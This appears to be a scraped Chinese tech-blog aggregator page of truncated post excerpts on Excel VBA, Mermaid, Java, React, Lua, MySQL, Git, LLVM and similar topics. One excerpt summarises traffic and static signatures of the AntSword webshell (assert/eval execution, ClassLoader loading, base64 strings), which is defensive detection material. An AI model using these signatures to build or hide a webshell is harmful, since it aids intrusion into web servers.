今天跟大家分享下我们如何将DeepSeek生成的VBA代码,做成按钮,将其永久保存在我们的Excel表格中,下次遇到类似的问题,直接在Excel中点击按钮,就能10秒搞定,操作也非常的简单. 一、代码准备 代码可以直接询问…...

deepseek+mermaid【自动生成流程图】

成果: 第一步打开deepseek官网(或百度版(更快一点)): 百度AI搜索 - 办公学习一站解决 第二步,生成对应的Mermaid流程图: 丢给deepseek代码,或题目要求 生成mermaid代码 第三步将代码复制到me…...

递归遍历目录 和 普通文件的复制 [Java EE]

递归遍历目录 首先 先列出当前目录所包含的内容 File[] files currentDir.listFiles();if (files null || files.length 0) {// 若是空目录或非法目录, 则直接返回return;} 然后 遍历列出的文件, 分情况两种讨论 for (File f: files) {// 加个日志, 方便查看程序执行情…...

安防监控/视频集中存储EasyCVR视频汇聚平台如何配置AI智能分析平台的接入?

EasyCVR安防视频监控平台不仅支持AI边缘计算智能硬件设备的接入,还能快速集成AI智能分析平台,接收来自智能分析平台或设备的AI告警信息,如烟火检测、周界入侵检测、危险区域闯入检测、安全帽/反光衣佩戴检测等。 本文将详细介绍如何在EasyCVR…...

React 之 Redux 第二十八节 学习目标与规划大纲及概要讲述

接下来 开始Redux 全面详细的文档输出,主要基于一下几个方面,欢迎大家补充指正 一、Redux 基础概念 为什么需要 Redux? 前端状态管理的挑战(组件间通信、状态共享) Redux 解决的问题:集中式、可预测的状态…...

五分钟快速学习优秀网站的HTML骨架布局设计

一.编写多级过滤脚本&#xff0c;在控制台执行copy方法进行提取&#xff1a; 过滤脚本脚本 // 在浏览器F12的控制台里&#xff0c;直接执行以下脚本 copy(document.documentElement.outerHTML// 一级过滤&#xff1a;移除动态内容.replace(/<script\b[^>]*>[\s\S]*?…...

神经网络AI原理回顾

长期记忆存储在大模型的参数权重中&#xff0c;不经过推理和编码无法读取&#xff0c;且必须依赖输入的提示&#xff0c;因为大模型不会无缘无故的自言自语&#xff0c;毕竟输入层是它唯一 与外界交互的窗口。 目前个性化大模型的局限就是训练成本过高&#xff0c;除非使用RAG&…...

常见webshell工具的流量特征

1、蚁剑 1.1、蚁剑webshell静态特征 蚁剑中php使用assert、eval执行&#xff1b;asp只有eval执行&#xff1b;在jsp使用的是Java类加载&#xff08;ClassLoader&#xff09;&#xff0c;同时会带有base64编码解码等字符特征。 1.2、蚁剑webshell动态特征 查看流量分析会发现…...

探秘基带算法:从原理到5G时代的通信变革【四】Polar 编解码(一)

文章目录 2.3 Polar 编解码2.3.1 Polar 码简介与发展背景2.3.2 信道极化理论基础对称容量与巴氏参数对称容量 I ( W ) I(W) I(W)巴氏参数 Z ( W ) Z(W) Z(W)常见信道信道联合信道分裂信道极化 本博客为系列博客&#xff0c;主要讲解各基带算法的原理与应用&#xff0c;包括&…...

【计算机网络】考研复试高频知识点总结

文章目录 一、基础概念1、计算机⽹络的定义2、计算机⽹络的目标3、计算机⽹络的组成4、计算机⽹络的分类5、计算机⽹络的拓扑结构6、计算机⽹络的协议7、计算机⽹络的分层结构8、OSI 参考模型9、TCP/IP 参考模型10、五层协议体系结构 二、物理层1、物理层的功能2、传输媒体3、 …...

nio多线程版本

多线程多路复用 多线程NIO&#xff0c;&#xff0c;就是多个线程&#xff0c;每个线程上都有一个Selector&#xff0c;&#xff0c;&#xff0c;比如说一个系统中一个线程用来接收请求&#xff0c;&#xff0c;剩余的线程用来读写数据&#xff0c;&#xff0c;每个线程独立干自…...

Lua | 每日一练 (5)

&#x1f4a2;欢迎来到张胤尘的技术站 &#x1f4a5;技术如江河&#xff0c;汇聚众志成。代码似星辰&#xff0c;照亮行征程。开源精神长&#xff0c;传承永不忘。携手共前行&#xff0c;未来更辉煌&#x1f4a5; 文章目录 Lua | 每日一练 (5)题目参考答案浅拷贝深拷贝使用场景…...

IO的概念和标准IO函数

作业&#xff1a; 1.使用标准IO函数&#xff0c;实现文件的拷贝 #include <stdio.h>int main(int argc, char *argv[]) {// 检查是否提供了源文件和目标文件if (argc ! 3) {printf("Usage: %s <source_file> <destination_file>\n", argv[0]);re…...

影刀RPA开发拓展--SQL常用语句全攻略

前言 SQL&#xff08;结构化查询语言&#xff09;是数据库管理和操作的核心工具&#xff0c;无论是初学者还是经验丰富的数据库管理员&#xff0c;掌握常用的 SQL 语句对于高效管理和查询数据都至关重要。本文将系统性地介绍最常用的 SQL 语句&#xff0c;并为每个语句提供详细…...

零信任架构和传统网络安全模式的

零信任到底是一个什么类型的模型&#xff1f;什么类型的思想或思路&#xff0c;它是如何实现的&#xff0c;我们要做零信任&#xff0c;需要考虑哪些问题&#xff1f; 零信任最早是约翰金德瓦格提出的安全模型。早期这个模型也是因为在安全研究上考虑的一个新的信任式模型。他最…...

【前端】HTML 备忘清单(超级详细!)

文章目录 入门hello.html注释 Comment段落 ParagraphHTML 链接Image 标签文本格式标签标题Section Divisions内部框架HTML 中的 JavaScriptHTML 中的 CSS HTML5 标签页面标题导航HTML5 TagsHTML5 VideoHTML5 AudioHTML5 RubyHTML5 kdiHTML5 progressHTML5 mark HTML 表格Table …...

React 中 useState 的 基础使用

概念&#xff1a;useState 是一个React Hook&#xff08;函数&#xff09;&#xff0c;它允许我们向组件添加状态变量&#xff0c;从而影响组件的渲染结果。 本质&#xff1a;和普通JS变量不同的是&#xff0c;状态变量一旦发生变化&#xff0c;组件的视图UI也会跟着变化&…...

蓝桥杯单片机组第十二届省赛第二批次

前言 第十二届省赛涉及知识点&#xff1a;NE555频率数据读取&#xff0c;NE555频率转换周期&#xff0c;PCF8591同时测量光敏电阻和电位器的电压、按键长短按判断。 本试题涉及模块较少&#xff0c;题目不难&#xff0c;基本上准备充分的都能完整的实现每一个功能&#xff0c;并…...

React Native 原理

React Native 是一个跨平台移动应用开发框架&#xff0c;它允许开发者使用 JavaScript 和 React 来开发 iOS 和 Android 原生应用。React Native 的核心原理是通过 桥接&#xff08;Bridge&#xff09; 技术&#xff0c;使用 JavaScript 来控制原生组件&#xff0c;并将应用逻辑…...

C++简易贪食蛇项目

一.案例介绍 二.制作思路 三.墙模块 #include "wall.h" //初始化墙 void initWall() { for (int i 0; i < HEIGHT; i) { for (int j 0; j < WIDTH;j) { if (i 0 || j 0 || i HEIGHT - 1 || j WIDTH - 1) …...

C++蓝桥杯基础篇(七)

片头 嗨~小伙伴们&#xff0c;大家好&#xff01;今天我们来一起学习蓝桥杯基础篇&#xff08;七&#xff09;&#xff0c;学习相关字符串的知识&#xff0c;准备好了吗&#xff1f;咱们开始咯&#xff01; 一、字符与整数的联系——ASCII码 每个常用字符都对应一个-128~127的…...

Sass基础

目录 什么是sass? Sass的安装 Sass的编译 Sass的语法&#xff1a; Sass的基本使用: 一、Sass变量&#xff1a; 二、嵌套语法&#xff1a; 三、import的使用&#xff1a; 四、mixin混入和include: 五、extend: 六、注释 七、if和if: 八、for: 总结&#xff1a; 什么是sas…...

Linux文档编辑相关命令详解

Linux文档编辑相关命令 1. grep grep (global regular expression) 命令用于查找文件里符合条件的字符串或正则表达式。 1.1 语法 grep [options] pattern [files] 1.2 常用选项 -i&#xff1a;忽略大小写进行匹配。-v&#xff1a;反向查找&#xff0c;只打印不匹配的行。-…...

QT实现简约美观的动画Checkbox

*最终效果: * 一共三个文件: main.cpp , FancyCheckbox.h , FancyCheckbox.cpp main.cpp #include <QApplication> #include "FancyCheckbox.h" #include <QGridLayout> int main(int argc, char *argv[]) {QApplication a(argc, argv);QWidget* w new…...

每日学习Java之一万个为什么?[MySQL面试篇]

分析SQL语句执行流程中遇到的问题 前言1 MySQL是怎么在一台服务器上启动的2 MySQL主库和从库是同时启动保持Alive的吗&#xff1f;3 如果不是主从怎么在启动的时候保证数据一致性4 ACID原则在MySQL上的体现5 数据在MySQL是通过什么DTO实现的6 客户端怎么与MySQL Server建立连接…...

git笔记

定义&#xff1a;分布式版本控制工具&#xff0c;免费开源的&#xff0c;快速高效的处理从小到大的项目&#xff0c;git占地面积小&#xff0c;性能快&#xff0c;有廉价的本地库 安装&#xff1a;官网最新版 全部点下一步就行 版本控制工具&#xff1a;使用中央服务器&#…...

Full GC 排查

在 Java 中&#xff0c;Full GC&#xff08;完全垃圾回收&#xff09;会对整个堆&#xff08;包括年轻代和老年代&#xff0c;甚至可能包括永久代/元空间&#xff09;进行垃圾回收&#xff0c;通常会导致较长的停顿&#xff08;STW&#xff0c;Stop-The-World&#xff09;。如果…...

VS2022远程调试Ubuntu中的C++程序

前言 最近想基于星火大模型的SDK开发第一些应用。但是&#xff0c;发现星火的SDK当中Linux版本的比较丰富&#xff0c;Windows 版本支持的比较少。但是&#xff0c;从调试的IDE而言&#xff0c;Visual Studio又是最方便的。所以&#xff0c;考虑采用Visual Studio Ubuntu的形式…...

Flutter 学习之旅 之 flutter 使用 flutter_screenutil 简单进行屏幕适配

Flutter 学习之旅 之 flutter 使用 flutter_screenutil 简单进行屏幕适配 目录 Flutter 学习之旅 之 flutter 使用 flutter_screenutil 简单进行屏幕适配 一、简单介绍 二、简单介绍 flutter_screenutil 三、安装 carousel_slider 四、简单案例实现 五、关键代码 六、补…...

【华为OD机考】华为OD笔试真题解析(16)--微服务的集成测试

题目描述 现在有n个容器服务&#xff0c;服务的启动可能有一定的依赖性&#xff08;有些服务启动没有依赖&#xff09;&#xff0c;其次&#xff0c;服务自身启动加载会消耗一些时间。 给你一个 n n n \times n nn的二维矩阵useTime&#xff0c;其中useTime[i][i]10表示服务…...

NCCL AI 分布式训练集合通讯库技术基本原理

目录 文章目录 目录AI 分布式训练NCCL 的简介NCCL 的核心功能NCCL 的基本工作流程NCCL 的集合通信操作方式NCCL 的 API 编程示例 AI 分布式训练 在一个最初的 AI 模型训练场景中&#xff0c;由于模型自身的程序体积、输入的参数量以及样本的数据量都比较有限&#xff0c;一张 …...

算法-回溯篇01-组合

组合 力扣题目链接 题目描述 给定两个整数 n 和 k&#xff0c;返回范围 [1, n] 中所有可能的 k 个数的组合。 你可以按 任何顺序 返回答案。 解题思路 刚开始做回溯的题目&#xff0c;关于回溯的相关知识推荐大家去看代码随想录的视频。 做了几道题&#xff0c;感觉回溯题…...

泵吸式激光可燃气体监测仪:快速精准守护燃气管网安全

在城市化进程加速的今天&#xff0c;燃气泄漏、地下管网老化等问题时刻威胁着城市安全。如何实现精准、高效的可燃气体监测&#xff0c;守护“城市生命线”&#xff0c;成为新型基础设施建设的核心课题。泵吸式激光可燃气体监测仪&#xff0c;以创新科技赋能安全监测&#xff0…...

Lumoz Chain正式上线:AI 时代的新算力破局者

新的叙事和技术突破永远是推动行业前行的核心动力。当下&#xff0c;AI Agent无疑是最炙手可热的赛道之一。 当加密世界将目光投向AI领域时&#xff0c;大多数项目仍停留在以AI为工具或应用场景的层面&#xff0c;试图通过集成AI模型或优化链上功能来吸引用户。然而&#xff0…...

算法之排序算法

排序算法 ♥常见排序算法知识体系详解♥ | Java 全栈知识体系 算法 - 排序 | CS-Notes 面试笔记 十大经典排序算法总结 | JavaGuide...

Java面试第七山!《MySQL索引》

一、索引的本质与作用 索引是帮助MySQL高效获取数据的数据结构&#xff0c;类似于书籍的目录。它通过减少磁盘I/O次数&#xff08;即减少数据扫描量&#xff09;来加速查询&#xff0c;尤其在百万级数据场景下&#xff0c;索引可将查询效率提升数十倍。 核心作用&#xff1a;…...

基于 Rust 与 GBT32960 规范的编解码层

根据架构设计&#xff0c;实现编解码层的代码设计 Cargo.toml 加入二进制序列化支持 # 序列化支持 ... bincode "1.3" # 添加二进制序列化支持 bytes-utils "0.1" # 添加字节处理工具 开始编码 错误处理&#xff08;error.rs&#x…...

二、Redis 安装与基本配置:全平台安装指南 服务器配置详解

Redis 安装与基本配置:全平台安装指南 & 服务器配置详解 Redis 作为高性能的内存数据库,其安装和配置是使用 Redis 的第一步。本篇文章将全面介绍 Redis 的安装方式,覆盖 Windows、Linux、Docker 环境,并详细讲解 Redis 的基础配置,包括 持久化、日志、端口设置等。此…...

⭐算法OJ⭐矩阵的相关操作【动态规划 + 组合数学】(C++ 实现)Unique Paths 系列

文章目录 62. Unique Paths动态规划思路实现代码复杂度分析 组合数学思路实现代码复杂度分析 63. Unique Paths II动态规划定义状态状态转移方程初始化复杂度分析 优化空间复杂度状态转移方程 62. Unique Paths There is a robot on an m x n grid. The robot is initially lo…...

基于 Elasticsearch 和 Milvus 的 RAG 运维知识库的架构设计和部署落地实现指南

最近在整理一些业务场景的架构设计和部署落地实现指南 先放一个 【基于RAG的运维知识库 (ElasticSearch + Milvus) 的详细实现指南】,其中包含了详尽的技术实现细节、可运行的示例代码、原理分析、优缺点分析和应用场景分析。 架构描述: 基于RAG的运维知识库 (ElasticSearch…...

山西青年杂志山西青年杂志社山西青年编辑部2025年第3期目录

青年争鸣 教师发展中心行动转向的价值意蕴分析框架研究与启示 于宝证;李军红;郑钰莹;何易雯; 产教融合视角下职业本科工商管理专业人才培养模式探析 杜芯铭; 青年教育研究 教育数字化背景下高职院校的课堂教学研究 张晨; 统筹职业教育、高等教育、继续教育协同…...

使用Truffle、Ganache、MetaMask、Vue+Web3完成的一个简单区块链项目

文章目录 概要初始化Truffle项目创建编写合约编译合约配置Ganache修改truffle-config.js文件编写迁移文件部署合约使用Truffle 控制台使用MetaMask和VueWeb3与链交互 概要 使用Truffle、Ganache、MetaMask、VueWeb3完成的一个简单区块链项目。 初始化Truffle项目 安装好truf…...

【GenBI优化】提升text2sql准确率:建议使用推理大模型,增加重试

引言 Text-to-SQL(文本转 SQL)是自然语言处理(NLP)领域的一项重要任务,旨在将自然语言问题自动转换为可在数据库上执行的 SQL 查询语句。这项技术在智能助手、数据分析工具、商业智能(BI)平台等领域具有广泛的应用前景,能够极大地降低数据查询和分析的门槛,让非技术用…...

LLVM - 编译器前端 - 学习将源文件转换为抽象语法树(二)

一:处理消息 在一个庞大的软件(比如编译器)中,我们不希望将消息字符串分散在各个地方。如果需要修改消息内容或将其翻译成另一种语言,最好将它们集中存放在一个地方!目前缺少的是对消息的集中定义。下面我们看看来如何实现它。 一种简单的方法是,每条消息都有一个 ID(一…...